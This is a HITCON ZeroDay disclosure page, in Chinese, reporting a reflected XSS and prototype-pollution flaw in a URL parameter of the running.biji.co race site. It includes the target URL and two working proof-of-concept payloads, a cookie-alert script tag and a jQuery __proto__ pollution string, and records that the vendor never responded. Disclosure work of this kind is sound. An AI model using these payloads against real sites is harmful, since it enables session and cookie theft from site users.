Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2021-00668
- Vendor: 運動筆記
- Title: 運動筆記 網址參數存在 XSS 與 原型污染
- Introduction: 網址參數存在 XSS 與 原型污染
處理狀態
目前狀態
公開
Last Update : 2021/11/10
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2021/09/10 00:14:14 : 新提交 (由 BTtea 更新此狀態)
- 2021/09/11 01:29:18 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2021/09/13 14:04:23 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2021/09/13 14:04:23 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2021/09/13 14:04:23 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2021/11/10 03:00:01 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2021-00668
- 通報者:blacktea_player (BTtea)
- 風險:低
- 類型:反射型跨站腳本攻擊 (Reflected Cross-Site Scripting)
參考資料
攻擊者可經由該漏洞竊取使用者身份,或進行掛碼、轉址等攻擊行為。
漏洞說明: OWASP - Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
防護原則: OWASP - XSS (Cross Site Scripting) Prevention Cheat Sheet
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
防禦繞過方式: OWASP - XSS Filter Evasion Cheat Sheet
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
漏洞說明: OWASP - Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
防護原則: OWASP - XSS (Cross Site Scripting) Prevention Cheat Sheet
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
防禦繞過方式: OWASP - XSS Filter Evasion Cheat Sheet
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
https://running.biji.co/index.php?q=competition&act=info&cid=9793&subtitle=第九屆日月潭環湖馬拉松
敘述
https://running.biji.co/index.php?q=competition&act=info&cid=9793&subtitle=第九屆日月潭環湖馬拉松
把 subtitle 值換成 xss payload 後執行即可觸發
xss payload : "><script>alert(document.cookie)</script>
xss 原型污染 PoC payload : "><script>$.extend(true,{},JSON.parse('{"__proto__":{"z":"xss"}}'));alert(z);</script>
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。